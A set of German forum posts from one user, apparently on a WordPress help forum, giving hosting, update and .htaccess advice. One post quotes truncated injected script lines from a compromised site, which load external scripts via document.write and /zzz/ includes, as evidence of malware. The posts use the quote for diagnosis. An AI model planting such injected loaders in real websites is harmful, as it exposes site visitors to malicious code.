Beiträge von Domino5702

    Zitat

    Habe zuerst versucht die Seite mit dem Designer von World4you zu gestalten

    Zitat

    Anschließend habe ich über World4you Wordpress installiert

    Zitat

    Nun sieht man auf meiner Seite immer, das was ich über den Designer gemacht habe

    wenn ich das richtig deute, ist der Hintergrund folgendes: der Browser sieht auf Deinem Webspace eine index.html (mit dem Designer erstellt) und eine index.php (die Startseite von WordPress). Seit den Anfängen des Internets kommt *.html vor *.php, deshalb siehst Du noch immer die erst erstellte Seite bzw. deren Inhalte.

    Du musst also vom Webspace die index.html entfernen, dann wird auch die WordPressseite angezeigt werden. Um dies zu bewerkstelligen, hast Du bei world4you entweder eine Art Dateimanager, wie Du es auch schon von Windows kennst, oder Du kannst auf den Webspace über FTP zugreifen. Da ich den Anbieter nicht kenne, kann ich Dir nicht sagen, was für Dich einfacher zu bewerkstelligen ist und/oder möglich ist.

    OK, also: wenn ich den Quellcode Deiner Homepage anschaue, fallen mir die folgenden Zeilen auf:

    Zitat

    <script language="JavaScript" type="text/javascript"> <!-- // SQ document.write("<"+"script language=\"JavaScript\" type=\"text/javascript\" src=\"http://statistiq.com/8685/?sessq=a2…n.height+%22%5C"></"+"SCRIPT>"); // --> </script> <script type="text/javascript" src="/zzz/gas.js"></script> </head> <script language="JavaScript" src="[URL="http://forum.wpde.org/view-source:ht…0.5,en-us;q=0.3"]/zzz/init.php?D=a2x1ZWdlcmxlYmVuLmF0LnZ1&L=de,en;q=0.8,de-de;q=0.5,en-us;q=0.3[/URL]" type="text/javascript"></script>

    Das scheint von einer vorgeschalteten index.html zu stammen - trifft das zu?

    Der Sucuri SiteCheck weist die Seite ebendfalls als befallen aus, ohne allerdings eine konkrete Bedrohung zu nennen.

    Hoffe, das hilft Dir erst einmal weiter, um den Schadcode zu identifizieren - Du musst allerdings dahinter kommen, woher und wie der auf Deine Seite gelangt, erst dann hast Du die Lücke geschlossen!

    Wenn Du den Quellcode Deiner Seite anschaust, kannst Du sehen, welches Styleshhet aufgerufen wird.

    Code
    <link rel="stylesheet" href="[URL="http://forum.wpde.org/view-source:http://not-guild.de/wordpress/wp-content/themes/open-sourcerer/style.css"]http://not-guild.de/wordpress/wp-content/themes/open-sourcerer/style.css[/URL]" type="text/css" media="screen,projection" />

    Naja, zuerst wollte ich einfach schreiben, dass Du die DE-Edition von hier laden und einfach manuell das Update durchführen sollst. Natürlich, nachdem Du eventuell direkt an den Core-Dateien vorgenommenen Änderungen gesichert hast und auch von der Datenbank ein Backup gezogen hast. Um unliebsame Komplikationen zu vermeiden, solltest Du auch vor dem Upgrade alle Plugins deaktivieren, und danach erst schrittweise aktivieren.

    Das ist eine Möglichkeit, den Du nach meinem besten Wissen so nutzen kannst.

    Aber das beantwortet Deine Frage nicht, wieso das deutsche Update nicht automatisch angeboten wird. Ich kann hier nur mutmassen:

    Hast Du eventuell ein Plugin für Mehrsprachigkeit im Einsatz - oder mal im Einsatz gehabt? Ich habe gerade kürzlich das erlebt, nachdem ich kurzfristig qTranslate aktiviert hatte. Seither wird mir auch nur das englische Update automatisch angeboten, was ich darauf zurückführe, dass dieses Plugin Englisch als Standardsprache setzt, wenn man es erst aktiviert.

    Aber es stellen sich mir auch andere Fragen: zwischen der 3.1.2 und 3.3.1 gab es ja noch ein paar Zwisachenschritte. Wurde Dir erst bei der neuesten Version nur englisch angeboten, oder allenfalls vorher schon? Allgemein, was für Plugins setzt Du ein, welches Theme und hast Du vielleicht kürzlich das Theme gewechselt?

    FileZilla bietet ja auch die Option "Manueller Transfer" (im Menüpunkt Transfer) an, ich würde dort mal ein paar Versuche machen.

    Von der Beschreibung her, könnte ich mir vorstellen, dass dies ein vorübergehendes Problem des Providers ist, mal dort auch ne Anfrage starten.

    Da ich auch eine Website bei square7.ch liegen habe, möchte ich dann doch klarstellen, dass auch die nicht einfach eine Website löschen. Meine Site zB. habe ich seit dem vergangenene Oktober nicht angefasst, und sie ist noch da! Auch davor war sie ca. 6 Monate "verwaist", ich hatte keinerlei Schwierigkeiten damit.

    Und das steht in den FAQ:

    Zitat

    Werden meine Seiten irgendwann gelöscht, wenn ich mich länger nicht mehr eingeloggt habe? Nein, ansich nicht. Aber manchmal (etwa einmal halbjährlich) werden inaktive Konten deaktiviert.
    Damit Dir das nicht passiert reicht es, wenn Du Dich zumindest 1x halbjährlich (alle 6 Monate) einloggst.

    Zitat

    Den Grund dafür kannst du z.B hier nachlesen

    http://playground.ebiene.de/initiati...ss-sicherheit/

    Hille: So ein Quatsch - den Artikel von Sergej Müller kenne ich natürlich. Nur hat er niemals gesagt, der Schutz von wp-admin sei unsinnig. Mit Deiner verkürzten Fassung stiftest Du bei nicht so kundigen Lesern Verwirrung. Es wäre besser gewesen, Du hättest gleich auf den Artikel verwiesen.

    Sichert man den gesamten Ordner /wp-admin/ mit einer .htaccess, so sperrt man damit beispielsweise auch die ganzen AJAX-Funktionalitäten von WordPress. Daher sollten die Zugriffe auf die Datei admin-ajax.php explizit von der Sperre ausgenommen werden:

    Code
    <Files admin-ajax.php>
         Order allow,deny
         Allow from all
         Satisfy any  
    </Files>

    Die Datei /wp-admin/css/install.css ist ein anderer Kandidat, mit dem ähnlich verfahren sollte

    Hallo, also ich habe jetzt den ganzen morgen gebastelt. Nach einigen mails mit STRAT0, es wurde unter anderem geschrieben ich müsse in der htaccess Datei was ändern, bin ich hergegangen und habe Deinem Hinweis entsprechend die config geändert, also ohne Zusatz Wordpress. Hatte dann aber wieder das Problem, dass die Startseite richtig angezeigt wurde aber die weiteren Seiten nicht. Daraufhin habe ich die Permalinks auf Standard gestellt und siehe da die Weiterleitung auf die einzelnen Seiten gingen. Es fehlte dann das Hintergrundbild und das Kopfbild und die einzelnen Verlinkungen auf den Seiten musste ich ändern. Vielen Dank für Deine Hilfe. Schönen Tag


    somaya: Keine Ahnung, was Du gemacht hast - ich habe jedenfalls nie was von "ändern der config" gesagt. Aber wenn es füre Dich jetzt stimmt, ist das gut - zumindest für Dich.

    Um das Chaos für unbeteiligte spätere Leser wieder ein wenig zu entwirren:

    • es gibt die MySql-Datenbank, die verwaltet wird über eine eigene Oberfläche (zumeist heisst die phpMyAdmin), über die man in seinem Kundenbereich beim Hosing Provider gelangt. In der Datenbank gibt es Tabellen, eine davon heisst wp_options (die Vorsilbe - hier wp_) kann variieren, aber es ist immer options dahinter
    • und es gibt die WordPress-Dateien, zu denen man über FTP gelangt. Da gibt es dann auch eine Datei, die wp-config.php heisst, die somaya angesprochen hat - aber die gar nichts mit dem vorliegenden Problem zu tun hat.

    Nichts stand mir ferner, als Dir Faulheit zu unterstellen - im Gegenteil, ich war drauf und dran, auch von den bunten Knöpfen anzufangen. Habe es dann sein lassen, weil es zu stark eine Unterstellung gewesen wäre - aber nun bestätigst Du es ja, also oute ich mich. ;)